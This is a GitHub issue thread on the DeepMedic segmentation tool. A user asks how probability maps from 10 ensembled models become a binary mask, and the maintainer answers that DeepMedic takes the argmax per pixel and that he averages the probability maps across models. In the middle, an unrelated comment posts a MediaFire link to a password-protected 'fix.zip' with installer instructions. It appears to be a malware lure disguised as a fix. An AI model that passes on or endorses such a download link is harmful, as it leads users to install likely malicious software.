### ISSUE TITLE
Threshold for Segmentation

### ISSUE THREAD

**Issue by sahar90o** [Kamnitsask/deepmedic#222]
Hello, 

I have a question regarding converting probability maps into a segmentation mask. 
I ran DeepMedic 10 times and already I have the output (probability maps for class 1 and class 0) from 10 different models. I want to calculate the segmentation mask of the ensemble model. I want to know if in DeepMedic during training and validation, a specific threshold is used to convert probabilities to binary masks (So I can also use the same threshold) or if it is optimized during training and validation and can have different values for different datasets. 

Thank you very much. 
Zahra

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kamnitsask** [comment]
Hello,

No special threshold used internally. So, the segmentation map is created by doing a class_predicted = argmax(probabilities of all classes) for each pixel. In other words, each pixel gets the class of maximum probability.

So, for ensembling, I tend to just average the probability map of each class over all models. So, if I have 10 models, and a 5-class-problem, which means 5 probability maps from each model, then I do 5 averages, where each average is over 10 probability maps. Then I just do argmax per pixel again.

I hope this helps!

(closing the issue as I think this covers it.)
